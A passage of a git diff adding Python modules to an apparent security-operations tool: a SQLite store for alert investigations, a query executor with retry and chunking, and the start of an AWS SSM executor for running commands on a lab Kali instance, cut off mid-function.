+ """Get a database connection."""
+ conn = sqlite3.connect(self.db_path)
+ conn.row_factory = sqlite3.Row
+ try:
+ yield conn
+ finally:
+ conn.close()
+
+ def _init_schema(self) -> None:
+ """Initialize database schema."""
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+
+ cursor.execute(self.SQL_CREATE_INVESTIGATIONS)
+ cursor.execute(self.SQL_CREATE_QUERY_EFFECTIVENESS)
+ cursor.execute(self.SQL_CREATE_SCHEMA_INFO)
+
+ for index_sql in self.SQL_CREATE_INDEXES:
+ cursor.execute(index_sql)
+
+ cursor.execute(
+ f"INSERT OR REPLACE INTO {self.TABLE_SCHEMA_INFO} (key, value) VALUES (?, ?)", # noqa: S608
+ ("version", str(self.SCHEMA_VERSION)),
+ )
+
+ conn.commit()
+
+ def _investigation_to_row(self, investigation: StoredInvestigation) -> tuple:
+ """Convert StoredInvestigation to a tuple for database insertion."""
+ return (
+ investigation.investigation_id,
+ investigation.alert_name,
+ investigation.alert_fingerprint,
+ investigation.severity,
+ investigation.technique_id,
+ investigation.technique_name,
+ investigation.started_at.isoformat(),
+ investigation.completed_at.isoformat(),
+ investigation.duration_seconds,
+ investigation.status,
+ investigation.evidence_count,
+ investigation.highest_pyramid_level,
+ json.dumps(investigation.techniques_identified),
+ json.dumps(investigation.queries_executed),
+ investigation.query_success_rate,
+ json.dumps(investigation.effective_queries),
+ 1
+ if investigation.is_true_positive
+ else (0 if investigation.is_true_positive is False else None),
+ investigation.analyst_notes,
+ json.dumps(investigation.metadata),
+ )
+
+ def store_investigation(self, investigation: StoredInvestigation) -> None:
+ """Store an investigation.
+
+ Args:
+ investigation: Investigation to store
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ cursor.execute(self.SQL_INSERT_INVESTIGATION, self._investigation_to_row(investigation))
+ conn.commit()
+ logger.info(f"Stored investigation {investigation.investigation_id}")
+ dn.log_metric("investigations_stored", 1, mode="count")
+
+ def get_investigation(self, investigation_id: str) -> StoredInvestigation | None:
+ """Retrieve an investigation by ID.
+
+ Args:
+ investigation_id: Investigation ID to retrieve
+
+ Returns:
+ StoredInvestigation or None if not found
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ cursor.execute(self.SQL_SELECT_INVESTIGATION, (investigation_id,))
+ row = cursor.fetchone()
+ return self._row_to_investigation(row) if row else None
+
+ def find_similar_investigations(
+ self,
+ alert_name: str | None = None,
+ alert_fingerprint: str | None = None,
+ technique_id: str | None = None,
+ severity: str | None = None,
+ limit: int = 10,
+ ) -> list[SimilarInvestigation]:
+ """Find similar past investigations.
+
+ Args:
+ alert_name: Alert name to match
+ alert_fingerprint: Alert fingerprint to match
+ technique_id: MITRE technique ID to match
+ severity: Severity level to match
+ limit: Maximum number of results
+
+ Returns:
+ List of SimilarInvestigation objects sorted by similarity
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+
+ conditions = []
+ params = []
+
+ if alert_fingerprint:
+ conditions.append("alert_fingerprint = ?")
+ params.append(alert_fingerprint)
+
+ if alert_name:
+ conditions.append("alert_name = ?")
+ params.append(alert_name)
+
+ if technique_id:
+ conditions.append("technique_id = ?")
+ params.append(technique_id)
+
+ if severity:
+ conditions.append("severity = ?")
+ params.append(severity)
+
+ if not conditions:
+ cursor.execute(self.SQL_SELECT_RECENT_INVESTIGATIONS, (limit,))
+ else:
+ where_clause = " OR ".join(conditions)
+ query = f"SELECT * FROM investigations WHERE {where_clause} ORDER BY completed_at DESC LIMIT ?" # noqa: S608 # nosec B608
+ cursor.execute(query, (*params, limit * 2)) # nosec B608
+
+ rows = cursor.fetchall()
+
+ similar = []
+ for row in rows:
+ investigation = self._row_to_investigation(row)
+ score, factors = self._calculate_similarity(
+ investigation,
+ alert_name=alert_name,
+ alert_fingerprint=alert_fingerprint,
+ technique_id=technique_id,
+ severity=severity,
+ )
+ if score > 0:
+ similar.append(
+ SimilarInvestigation(
+ investigation=investigation,
+ similarity_score=score,
+ matching_factors=factors,
+ )
+ )
+
+ similar.sort(key=lambda x: x.similarity_score, reverse=True)
+ return similar[:limit]
+
+ def _calculate_similarity(
+ self,
+ investigation: StoredInvestigation,
+ alert_name: str | None = None,
+ alert_fingerprint: str | None = None,
+ technique_id: str | None = None,
+ severity: str | None = None,
+ ) -> tuple[float, list[str]]:
+ """Calculate similarity score for an investigation.
+
+ Returns:
+ Tuple of (score, list of matching factors)
+ """
+ score = 0.0
+ factors = []
+
+ # Fingerprint match is highest weight (same alert type)
+ if alert_fingerprint and investigation.alert_fingerprint == alert_fingerprint:
+ score += 0.5
+ factors.append("same_alert_fingerprint")
+
+ # Alert name match
+ if alert_name and investigation.alert_name == alert_name:
+ score += 0.3
+ factors.append("same_alert_name")
+
+ # Technique match
+ if technique_id and investigation.technique_id == technique_id:
+ score += 0.15
+ factors.append("same_technique")
+
+ # Severity match
+ if severity and investigation.severity == severity:
+ score += 0.05
+ factors.append("same_severity")
+
+ return score, factors
+
+ def _row_to_investigation(self, row: sqlite3.Row) -> StoredInvestigation:
+ """Convert a database row to StoredInvestigation."""
+ return StoredInvestigation(
+ investigation_id=row["investigation_id"],
+ alert_name=row["alert_name"],
+ alert_fingerprint=row["alert_fingerprint"],
+ severity=row["severity"],
+ technique_id=row["technique_id"],
+ technique_name=row["technique_name"],
+ started_at=datetime.fromisoformat(row["started_at"]),
+ completed_at=datetime.fromisoformat(row["completed_at"]),
+ duration_seconds=row["duration_seconds"],
+ status=row["status"],
+ evidence_count=row["evidence_count"],
+ highest_pyramid_level=row["highest_pyramid_level"],
+ techniques_identified=json.loads(row["techniques_identified"] or "[]"),
+ queries_executed=json.loads(row["queries_executed"] or "[]"),
+ query_success_rate=row["query_success_rate"],
+ effective_queries=json.loads(row["effective_queries"] or "[]"),
+ is_true_positive=None
+ if row["is_true_positive"] is None
+ else bool(row["is_true_positive"]),
+ analyst_notes=row["analyst_notes"],
+ metadata=json.loads(row["metadata"] or "{}"),
+ )
+
+ def update_query_effectiveness(
+ self,
+ query_pattern: str,
+ successful: bool,
+ produced_evidence: bool,
+ alert_type: str,
+ ) -> None:
+ """Update query effectiveness statistics.
+
+ Args:
+ query_pattern: Normalized query pattern
+ successful: Whether query returned results
+ produced_evidence: Whether query led to recorded evidence
+ alert_type: Alert name where query was used
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ now = datetime.now(timezone.utc).isoformat()
+
+ cursor.execute(self.SQL_SELECT_QUERY_EFFECTIVENESS, (query_pattern,))
+ row = cursor.fetchone()
+
+ if row:
+ alert_types = json.loads(row["alert_types"] or "[]")
+ if alert_type not in alert_types:
+ alert_types.append(alert_type)
+
+ cursor.execute(
+ self.SQL_UPDATE_QUERY_EFFECTIVENESS,
+ (
+ 1 if successful else 0,
+ 1 if produced_evidence else 0,
+ json.dumps(alert_types),
+ now,
+ query_pattern,
+ ),
+ )
+ else:
+ cursor.execute(
+ self.SQL_INSERT_QUERY_EFFECTIVENESS,
+ (
+ query_pattern,
+ 1 if successful else 0,
+ 1 if produced_evidence else 0,
+ json.dumps([alert_type]),
+ now,
+ ),
+ )
+
+ conn.commit()
+
+ def get_effective_queries(
+ self,
+ alert_type: str | None = None,
+ min_evidence_rate: float = 0.3,
+ limit: int = 20,
+ ) -> list[QueryEffectiveness]:
+ """Get most effective queries.
+
+ Args:
+ alert_type: Filter by alert type
+ min_evidence_rate: Minimum evidence production rate
+ limit: Maximum results
+
+ Returns:
+ List of QueryEffectiveness objects
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ cursor.execute(self.SQL_SELECT_EFFECTIVE_QUERIES, (limit * 2,))
+
+ results = []
+ for row in cursor.fetchall():
+ alert_types = json.loads(row["alert_types"] or "[]")
+
+ if alert_type and alert_type not in alert_types:
+ continue
+
+ qe = QueryEffectiveness(
+ query_pattern=row["query_pattern"],
+ total_executions=row["total_executions"],
+ successful_executions=row["successful_executions"],
+ evidence_producing=row["evidence_producing"],
+ alert_types=alert_types,
+ )
+
+ if qe.evidence_rate >= min_evidence_rate:
+ results.append(qe)
+
+ if len(results) >= limit:
+ break
+
+ return results
+
+ def get_statistics(self) -> dict[str, Any]:
+ """Get overall statistics.
+
+ Returns:
+ Dictionary with statistics
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+
+ # Investigation stats
+ cursor.execute("SELECT COUNT(*) as total FROM investigations")
+ total_investigations = cursor.fetchone()["total"]
+
+ cursor.execute("SELECT status, COUNT(*) as count FROM investigations GROUP BY status")
+ status_counts = {row["status"]: row["count"] for row in cursor.fetchall()}
+
+ cursor.execute("SELECT AVG(evidence_count) as avg_evidence FROM investigations")
+ avg_evidence = cursor.fetchone()["avg_evidence"] or 0
+
+ cursor.execute("SELECT AVG(highest_pyramid_level) as avg_pyramid FROM investigations")
+ avg_pyramid = cursor.fetchone()["avg_pyramid"] or 0
+
+ cursor.execute("SELECT AVG(duration_seconds) as avg_duration FROM investigations")
+ avg_duration = cursor.fetchone()["avg_duration"] or 0
+
+ # Query stats
+ cursor.execute("SELECT COUNT(*) as total FROM query_effectiveness")
+ total_queries = cursor.fetchone()["total"]
+
+ cursor.execute(
+ """
+ SELECT AVG(CAST(evidence_producing AS REAL) / NULLIF(total_executions, 0))
+ as avg_evidence_rate FROM query_effectiveness
+ WHERE total_executions >= 3
+ """
+ )
+ avg_query_evidence_rate = cursor.fetchone()["avg_evidence_rate"] or 0
+
+ # True positive rate (if labeled)
+ cursor.execute(
+ """
+ SELECT
+ COUNT(CASE WHEN is_true_positive = 1 THEN 1 END) as true_positives,
+ COUNT(CASE WHEN is_true_positive = 0 THEN 1 END) as false_positives,
+ COUNT(CASE WHEN is_true_positive IS NOT NULL THEN 1 END) as labeled
+ FROM investigations
+ """
+ )
+ tp_row = cursor.fetchone()
+ true_positives = tp_row["true_positives"]
+ false_positives = tp_row["false_positives"]
+ labeled = tp_row["labeled"]
+
+ tp_rate = true_positives / labeled if labeled > 0 else None
+
+ return {
+ "total_investigations": total_investigations,
+ "status_distribution": status_counts,
+ "avg_evidence_count": round(avg_evidence, 1),
+ "avg_pyramid_level": round(avg_pyramid, 1),
+ "avg_duration_seconds": round(avg_duration, 1),
+ "total_query_patterns": total_queries,
+ "avg_query_evidence_rate": round(avg_query_evidence_rate * 100, 1)
+ if avg_query_evidence_rate
+ else 0,
+ "labeling": {
+ "true_positives": true_positives,
+ "false_positives": false_positives,
+ "unlabeled": total_investigations - labeled,
+ "true_positive_rate": round(tp_rate * 100, 1) if tp_rate is not None else None,
+ },
+ }
+
+ def label_investigation(
+ self,
+ investigation_id: str,
+ is_true_positive: bool,
+ analyst_notes: str | None = None,
+ ) -> bool:
+ """Label an investigation as true/false positive.
+
+ Args:
+ investigation_id: Investigation to label
+ is_true_positive: Whether it was a true positive
+ analyst_notes: Optional analyst notes
+
+ Returns:
+ True if updated, False if investigation not found
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ cursor.execute(
+ self.SQL_UPDATE_LABEL,
+ (1 if is_true_positive else 0, analyst_notes, investigation_id),
+ )
+ conn.commit()
+
+ if cursor.rowcount > 0:
+ logger.info(
+ f"Labeled investigation {investigation_id} as "
+ f"{'true' if is_true_positive else 'false'} positive"
+ )
+ return True
+ return False
+
+ def get_false_positive_patterns(self, min_occurrences: int = 3) -> list[dict[str, Any]]:
+ """Get patterns from known false positives.
+
+ Args:
+ min_occurrences: Minimum occurrences to consider a pattern
+
+ Returns:
+ List of false positive patterns
+ """
+ with self._get_connection() as conn:
+ cursor = conn.cursor()
+ cursor.execute(self.SQL_SELECT_FALSE_POSITIVE_PATTERNS, (min_occurrences,))
+
+ return [
+ {
+ "alert_name": row["alert_name"],
+ "fingerprint": row["alert_fingerprint"],
+ "technique_id": row["technique_id"],
+ "occurrences": row["occurrences"],
+ "avg_evidence": round(row["avg_evidence"], 1),
+ "recommendation": "Consider tuning this alert rule",
+ }
+ for row in cursor.fetchall()
+ ]
+
+
+def create_stored_investigation_from_state(
+ state: InvestigationState,
+ status: str,
+) -> StoredInvestigation:
+ """Create a StoredInvestigation from InvestigationState.
+
+ Args:
+ state: Investigation state object
+ status: Final status (completed, escalated, timeout, failed)
+
+ Returns:
+ StoredInvestigation ready for persistence
+ """
+
+ now = datetime.now(timezone.utc)
+
+ # Generate alert fingerprint from labels
+ labels = state.alert.get("labels", {})
+ fingerprint = labels.get("__alert_rule_uid__") or labels.get("alertname", "unknown")
+
+ queries = state.executed_queries
+ if queries:
+ successful = sum(1 for q in queries if q.get("result_count", 0) > 0)
+ query_success_rate = successful / len(queries)
+ else:
+ query_success_rate = 0.0
+
+ effective_queries = [
+ q.get("query", "") for q in queries if q.get("result_count", 0) > 0 and q.get("query")
+ ]
+
+ technique_id = None
+ technique_name = None
+ if state.identified_techniques:
+ technique_id = next(iter(state.identified_techniques))
+ technique_name = state.technique_names.get(technique_id)
+
+ return StoredInvestigation(
+ investigation_id=state.investigation_id,
+ alert_name=labels.get("alertname", "unknown"),
+ alert_fingerprint=fingerprint,
+ severity=labels.get("severity", "unknown"),
+ technique_id=technique_id,
+ technique_name=technique_name,
+ started_at=state.started_at,
+ completed_at=now,
+ duration_seconds=(now - state.started_at).total_seconds(),
+ status=status,
+ evidence_count=len(state.evidence),
+ highest_pyramid_level=state.highest_pyramid_level,
+ techniques_identified=list(state.identified_techniques),
+ queries_executed=queries,
+ query_success_rate=query_success_rate,
+ effective_queries=effective_queries,
+ metadata={
+ "escalated": state.escalated,
+ "escalation_reason": state.escalation_reason,
+ "hosts_investigated": list(state.queried_hosts),
+ "users_investigated": list(state.queried_users),
+ },
+ )
+
+
+# Global store instance
+_store: InvestigationStore | None = None
+
+
+def get_investigation_store(db_path: Path | str | None = None) -> InvestigationStore:
+ """Get or create the global investigation store.
+
+ Args:
+ db_path: Path to database file (default: ~/.ares/investigations.db)
+
+ Returns:
+ InvestigationStore instance
+ """
+ global _store
+
+ if _store is None:
+ if db_path is None:
+ db_path = Path.home() / ".ares" / "investigations.db"
+ _store = InvestigationStore(db_path)
+
+ return _store
+
+
+def reset_investigation_store() -> None:
+ """Reset the global store (for testing)."""
+ global _store
+ _store = None
diff --git a/src/ares/core/query_resilience.py b/src/ares/core/query_resilience.py
new file mode 100644
index 00000000..32944b99
--- /dev/null
+++ b/src/ares/core/query_resilience.py
@@ -0,0 +1,402 @@
+"""
+Query resilience module for handling timeouts and retries.
+
+Provides automatic time range reduction, retry with backoff,
+and query chunking for large time ranges.
+"""
+
+import asyncio
+from collections.abc import Callable
+from dataclasses import dataclass, field
+from datetime import datetime, timedelta, timezone
+from typing import Any, ClassVar
+
+import dreadnode as dn
+from loguru import logger
+
+
+@dataclass
+class QueryAttempt:
+ """Record of a query attempt."""
+
+ query: str
+ start_time: str
+ end_time: str
+ attempt_number: int
+ success: bool
+ error: str | None = None
+ result_count: int = 0
+ duration_ms: int = 0
+
+
+@dataclass
+class QueryStats:
+ """Statistics for query execution."""
+
+ total_attempts: int = 0
+ successful_attempts: int = 0
+ timeout_count: int = 0
+ retry_count: int = 0
+ time_range_reductions: int = 0
+ attempts: list[QueryAttempt] = field(default_factory=list)
+
+ @property
+ def success_rate(self) -> float:
+ if self.total_attempts == 0:
+ return 0.0
+ return self.successful_attempts / self.total_attempts
+
+
+class QueryResilientExecutor:
+ """Executes queries with automatic retry and time range reduction.
+
+ Features:
+ - Automatic time range reduction on timeout
+ - Exponential backoff for retries
+ - Query chunking for large time ranges
+ - Statistics tracking for monitoring
+ """
+
+ TIME_RANGE_FACTORS: ClassVar[list[float]] = [1.0, 0.5, 0.25, 0.1]
+ BACKOFF_DELAYS: ClassVar[list[int]] = [1, 2, 4]
+
+ def __init__(
+ self,
+ max_retries: int = 3,
+ initial_timeout: float = 30.0,
+ enable_chunking: bool = True,
+ chunk_size_minutes: int = 30,
+ ):
+ """Initialize the resilient executor.
+
+ Args:
+ max_retries: Maximum number of retry attempts
+ initial_timeout: Initial timeout in seconds
+ enable_chunking: Whether to enable query chunking for large ranges
+ chunk_size_minutes: Size of each chunk in minutes
+ """
+ self.max_retries = max_retries
+ self.initial_timeout = initial_timeout
+ self.enable_chunking = enable_chunking
+ self.chunk_size_minutes = chunk_size_minutes
+ self.stats = QueryStats()
+
+ async def execute_with_resilience(
+ self,
+ query_fn: Callable[..., Any],
+ query: str,
+ start_time: str,
+ end_time: str,
+ **kwargs: Any,
+ ) -> dict[str, Any]:
+ """Execute a query with automatic retry and time range reduction.
+
+ Args:
+ query_fn: The async query function to call
+ query: The query string (LogQL or PromQL)
+ start_time: ISO8601 start timestamp
+ end_time: ISO8601 end timestamp
+ **kwargs: Additional arguments for the query function
+
+ Returns:
+ Query result dict with additional metadata about retries
+ """
+ start_dt = datetime.fromisoformat(start_time.replace("Z", "+00:00"))
+ end_dt = datetime.fromisoformat(end_time.replace("Z", "+00:00"))
+ original_range = end_dt - start_dt
+
+ if self.enable_chunking and original_range > timedelta(hours=2):
+ logger.info(f"Query range ({original_range}) exceeds 2h, using chunked execution")
+ return await self._execute_chunked(query_fn, query, start_dt, end_dt, **kwargs)
+
+ # Try with progressively smaller time ranges
+ last_error = None
+ for _factor_idx, factor in enumerate(self.TIME_RANGE_FACTORS):
+ if factor < 1.0:
+ self.stats.time_range_reductions += 1
+
+ # Calculate reduced time range (centered on end time since recent data is usually more relevant)
+ reduced_range = original_range * factor
+ new_start = end_dt - reduced_range
+ new_start_str = new_start.isoformat().replace("+00:00", "Z")
+ new_end_str = end_dt.isoformat().replace("+00:00", "Z")
+
+ if factor < 1.0:
+ logger.info(
+ f"Reducing time range to {factor * 100:.0f}% ({reduced_range}) for retry"
+ )
+
+ # Try with retries at this time range
+ for attempt in range(self.max_retries):
+ self.stats.total_attempts += 1
+ attempt_start = datetime.now(timezone.utc)
+
+ try:
+ if attempt > 0:
+ self.stats.retry_count += 1
+ delay = self.BACKOFF_DELAYS[min(attempt - 1, len(self.BACKOFF_DELAYS) - 1)]
+ logger.info(
+ f"Retry attempt {attempt + 1}/{self.max_retries} after {delay}s backoff"
+ )
+ await asyncio.sleep(delay)
+
+ # Execute the query with timeout
+ timeout = self.initial_timeout * (
+ 1 + attempt * 0.5
+ ) # Increase timeout on retries
+ result = await asyncio.wait_for(
+ query_fn(
+ logql=query,
+ start_time=new_start_str,
+ end_time=new_end_str,
+ **kwargs,
+ ),
+ timeout=timeout,
+ )
+
+ if isinstance(result, dict) and result.get("status") == "error":
+ error_msg = result.get("error", "Unknown error")
+ if "timeout" in error_msg.lower() or "deadline" in error_msg.lower():
+ self.stats.timeout_count += 1
+ last_error = error_msg
+ logger.warning(f"Query timeout: {error_msg}")
+ continue # Try next retry
+ # Other errors, still return but log
+ logger.warning(f"Query error (non-timeout): {error_msg}")
+
+ # Success!
+ self.stats.successful_attempts += 1
+ duration_ms = int(
+ (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000
+ )
+
+ # Record attempt
+ self.stats.attempts.append(
+ QueryAttempt(
+ query=query[:100],
+ start_time=new_start_str,
+ end_time=new_end_str,
+ attempt_number=attempt + 1,
+ success=True,
+ result_count=self._count_results(result),
+ duration_ms=duration_ms,
+ )
+ )
+
+ if isinstance(result, dict):
+ result["_resilience_metadata"] = {
+ "original_start": start_time,
+ "original_end": end_time,
+ "actual_start": new_start_str,
+ "actual_end": new_end_str,
+ "time_range_factor": factor,
+ "retry_count": attempt,
+ "time_range_reduced": factor < 1.0,
+ }
+
+ dn.log_metric("query_success", 1, mode="count")
+ return result
+
+ except asyncio.TimeoutError:
+ self.stats.timeout_count += 1
+ duration_ms = int(
+ (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000
+ )
+ last_error = f"Timeout after {timeout}s"
+ logger.warning(f"Query timed out after {timeout}s (attempt {attempt + 1})")
+
+ self.stats.attempts.append(
+ QueryAttempt(
+ query=query[:100],
+ start_time=new_start_str,
+ end_time=new_end_str,
+ attempt_number=attempt + 1,
+ success=False,
+ error=last_error,
+ duration_ms=duration_ms,
+ )
+ )
+
+ except Exception as e:
+ duration_ms = int(
+ (datetime.now(timezone.utc) - attempt_start).total_seconds() * 1000
+ )
+ last_error = str(e)
+ logger.error(f"Query failed: {e}")
+
+ self.stats.attempts.append(
+ QueryAttempt(
+ query=query[:100],
+ start_time=new_start_str,
+ end_time=new_end_str,
+ attempt_number=attempt + 1,
+ success=False,
+ error=last_error,
+ duration_ms=duration_ms,
+ )
+ )
+
+ # Check for gRPC errors (non-retryable in most cases)
+ if "grpc" in str(e).lower():
+ break # Move to next time range factor
+
+ # All attempts failed
+ dn.log_metric("query_all_retries_failed", 1, mode="count")
+ logger.error(f"All query attempts failed after {self.stats.total_attempts} attempts")
+
+ return {
+ "status": "error",
+ "error": f"Query failed after all retries. Last error: {last_error}",
+ "_resilience_metadata": {
+ "total_attempts": self.stats.total_attempts,
+ "timeout_count": self.stats.timeout_count,
+ "time_range_reductions": self.stats.time_range_reductions,
+ "final_time_range_factor": self.TIME_RANGE_FACTORS[-1],
+ },
+ "suggestion": (
+ "The query consistently times out. Try:\n"
+ "1. Use more specific label filters to reduce data volume\n"
+ "2. Query a shorter time range manually\n"
+ "3. Simplify the regex patterns in the query"
+ ),
+ }
+
+ async def _execute_chunked(
+ self,
+ query_fn: Callable[..., Any],
+ query: str,
+ start_dt: datetime,
+ end_dt: datetime,
+ **kwargs: Any,
+ ) -> dict[str, Any]:
+ """Execute a query in chunks and merge results.
+
+ Args:
+ query_fn: The async query function
+ query: The query string
+ start_dt: Start datetime
+ end_dt: End datetime
+ **kwargs: Additional query arguments
+
+ Returns:
+ Merged results from all chunks
+ """
+ chunk_delta = timedelta(minutes=self.chunk_size_minutes)
+ chunks = []
+ current_start = start_dt
+
+ while current_start < end_dt:
+ current_end = min(current_start + chunk_delta, end_dt)
+ chunks.append((current_start, current_end))
+ current_start = current_end
+
+ logger.info(f"Executing query in {len(chunks)} chunks of {self.chunk_size_minutes}min each")
+
+ all_results = []
+ failed_chunks = []
+
+ for i, (chunk_start, chunk_end) in enumerate(chunks):
+ logger.debug(f"Executing chunk {i + 1}/{len(chunks)}")
+
+ chunk_result = await self.execute_with_resilience(
+ query_fn,
+ query,
+ chunk_start.isoformat().replace("+00:00", "Z"),
+ chunk_end.isoformat().replace("+00:00", "Z"),
+ **kwargs,
+ )
+
+ if isinstance(chunk_result, dict) and chunk_result.get("status") == "error":
+ failed_chunks.append(i)
+ logger.warning(f"Chunk {i + 1} failed: {chunk_result.get('error')}")
+ else:
+ all_results.append(chunk_result)
+
+ # Merge results
+ merged = self._merge_chunk_results(all_results)
+
+ if isinstance(merged, dict):
+ merged["_chunked_execution"] = {
+ "total_chunks": len(chunks),
+ "successful_chunks": len(all_results),
+ "failed_chunks": len(failed_chunks),
+ "chunk_size_minutes": self.chunk_size_minutes,
+ }
+
+ if failed_chunks:
+ logger.warning(f"{len(failed_chunks)}/{len(chunks)} chunks failed")
+
+ return merged
+
+ def _merge_chunk_results(self, results: list[dict[str, Any]]) -> dict[str, Any]:
+ """Merge results from multiple chunks.
+
+ Args:
+ results: List of query results from chunks
+
+ Returns:
+ Merged result dict
+ """
+ if not results:
+ return {"status": "success", "data": {"result": []}}
+
+ # For Loki-style results, merge the streams
+ merged_streams = []
+ for result in results:
+ if isinstance(result, dict):
+ data = result.get("data", {})
+ streams = data.get("result", [])
+ merged_streams.extend(streams)
+
+ return {
+ "status": "success",
+ "data": {"result": merged_streams},
+ }
+
+ def _count_results(self, result: Any) -> int:
+ """Count the number of results in a query response."""
+ if isinstance(result, list):
+ return len(result)
+ if isinstance(result, dict):
+ data = result.get("data", {})
+ streams = data.get("result", [])
+ if isinstance(streams, list):
+ total = 0
+ for stream in streams:
+ values = stream.get("values", [])
+ total += len(values) if isinstance(values, list) else 0
+ return total
+ return 0
+
+ def get_stats_summary(self) -> dict[str, Any]:
+ """Get a summary of query statistics.
+
+ Returns:
+ Dict with query execution statistics
+ """
+ return {
+ "total_attempts": self.stats.total_attempts,
+ "successful_attempts": self.stats.successful_attempts,
+ "success_rate": f"{self.stats.success_rate * 100:.1f}%",
+ "timeout_count": self.stats.timeout_count,
+ "retry_count": self.stats.retry_count,
+ "time_range_reductions": self.stats.time_range_reductions,
+ }
+
+
+# Singleton instance for global use
+_resilient_executor: QueryResilientExecutor | None = None
+
+
+def get_resilient_executor() -> QueryResilientExecutor:
+ """Get or create the global resilient executor instance."""
+ global _resilient_executor
+ if _resilient_executor is None:
+ _resilient_executor = QueryResilientExecutor()
+ return _resilient_executor
+
+
+def reset_resilient_executor() -> None:
+ """Reset the global executor (for testing or new investigations)."""
+ global _resilient_executor
+ _resilient_executor = None
diff --git a/src/ares/core/remote.py b/src/ares/core/remote.py
new file mode 100644
index 00000000..51c278fd
--- /dev/null
+++ b/src/ares/core/remote.py
@@ -0,0 +1,407 @@
+"""Remote command execution via AWS SSM.
+
+This module provides functionality to execute commands on remote EC2 instances
+(specifically the Kali attack box) using AWS Systems Manager (SSM).
+"""
+
+import os
+import time
+from dataclasses import dataclass
+from typing import Any, NoReturn
+
+import boto3
+from botocore.exceptions import ClientError, SSOTokenLoadError, TokenRetrievalError
+from loguru import logger
+
+
+class SSOTokenExpiredError(Exception):
+ """Raised when AWS SSO token has expired and needs refresh."""
+
+
+@dataclass
+class CommandResult:
+ """Result of a remote command execution."""
+
+ stdout: str
+ stderr: str
+ return_code: int
+ success: bool
+
+ @property
+ def output(self) -> str:
+ """Combined stdout and stderr output."""
+ if self.stderr:
+ return f"{self.stdout}\n{self.stderr}"
+ return self.stdout
+
+
+class SSMExecutor:
+ """Execute commands on remote EC2 instances via AWS SSM.
+
+ This class handles command execution on the Kali attack box using
+ AWS Systems Manager send-command API.
+
+ Attributes:
+ instance_id: EC2 instance ID of the target (Kali box)
+ profile: AWS profile name for authentication
+ region: AWS region
+ """
+
+ def __init__(
+ self,
+ instance_id: str | None = None,
+ instance_name: str | None = None,
+ profile: str = "lab",
+ region: str = "us-west-1",
+ ):
+ """Initialize the SSM executor.
+
+ Args:
+ instance_id: EC2 instance ID (if known)
+ instance_name: EC2 instance Name tag to resolve to instance ID
+ profile: AWS profile name
+ region: AWS region
+ """
+ self.profile = profile
+ self.region = region
+ self._instance_id = instance_id
+ self._instance_name = instance_name or os.environ.get(
+ "ARES_KALI_INSTANCE", "staging-alpha-operator-range-kali"
+ )
+ self._ssm_client: Any = None
+ self._ec2_client: Any = None
+
+ def _create_session(self) -> boto3.Session:
+ """Create a boto3 session, validating SSO token first."""
+ try:
+ session = boto3.Session(profile_name=self.profile, region_name=self.region)
+ # Force credential resolution to catch SSO errors early
+ credentials = session.get_credentials()
+ if credentials is None:
+ raise SSOTokenExpiredError( # noqa: TRY301
+ f"No credentials available for profile '{self.profile}'. "
+ f"Run: aws sso login --profile {self.profile}"
+ )
+ # Try to actually use the credentials to validate them
+ credentials.get_frozen_credentials()
+ return session
+ except (TokenRetrievalError, SSOTokenLoadError) as e:
+ self._handle_sso_error(e)
+ except Exception as e:
+ if "token" in str(e).lower() and (
+ "expired" in str(e).lower() or "sso" in str(e).lower()
+ ):
+ self._handle_sso_error(e)
+ raise
+
+ def _handle_sso_error(self, original_error: Exception) -> NoReturn:
+ """Handle SSO token errors with helpful message and optional auto-refresh."""
+ error_msg = (
+ f"\n{'=' * 60}\n"
+ f"AWS SSO TOKEN EXPIRED\n"
+ f"{'=' * 60}\n"
+ f"Your AWS SSO session has expired.\n\n"
+ f"To fix this, run:\n"
+ f" aws sso login --profile {self.profile}\n\n"
+ f"Original error: {original_error}\n"
+ f"{'=' * 60}\n"
+ )
+ logger.error(error_msg)
+
+ # Clear cached clients so next attempt will re-authenticate
+ self._invalidate_clients()
+
+ raise SSOTokenExpiredError(
+ f"AWS SSO token expired for profile '{self.profile}'. "
+ f"Run: aws sso login --profile {self.profile}"
+ ) from original_error
+
+ def _invalidate_clients(self) -> None:
+ """Clear cached clients to force re-authentication on next use."""
+ self._ssm_client = None
+ self._ec2_client = None
+ self._instance_id = None
+
+ @property
+ def ssm_client(self) -> Any:
+ """Lazy-load SSM client with SSO token validation."""
+ if self._ssm_client is None:
+ session = self._create_session()
+ self._ssm_client = session.client("ssm")
+ return self._ssm_client
+
+ @property
+ def ec2_client(self) -> Any:
+ """Lazy-load EC2 client with SSO token validation."""
+ if self._ec2_client is None:
+ session = self._create_session()
+ self._ec2_client = session.client("ec2")
+ return self._ec2_client
+
+ @property
+ def instance_id(self) -> str:
+ """Resolve and return the instance ID."""
+ if self._instance_id is None:
+ self._instance_id = self._resolve_instance_id()
+ return self._instance_id
+
+ def _resolve_instance_id(self) -> str:
+ """Resolve instance name to instance ID via EC2 API."""
+ try:
+ response = self.ec2_client.describe_instances(
+ Filters=[
+ {"Name": "tag:Name", "Values": [self._instance_name]},
+ {"Name": "instance-state-name", "Values": ["running"]},
+ ]
+ )
+
+ for reservation in response.get("Reservations", []):
+ for instance in reservation.get("Instances", []):
+ instance_id = instance.get("InstanceId")
+ if instance_id:
+ logger.info(
+ f"Resolved Kali instance '{self._instance_name}' to {instance_id}"
+ )
+ return instance_id
+
+ raise RuntimeError(f"No running instance found with name '{self._instance_name}'") # noqa: TRY301
+
+ except SSOTokenExpiredError:
+ raise
+ except (TokenRetrievalError, SSOTokenLoadError) as e:
+ self._handle_sso_error(e)
+ except ClientError as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ raise RuntimeError(f"Failed to resolve instance ID: {e}") from e
+ except Exception as e:
+ error_str = str(e).lower()
+ if "token" in error_str and ("expired" in error_str or "sso" in error_str):
+ self._handle_sso_error(e)
+ raise
+
+ def run_command(
+ self,
+ command: str | list[str],
+ timeout_seconds: int = 300,
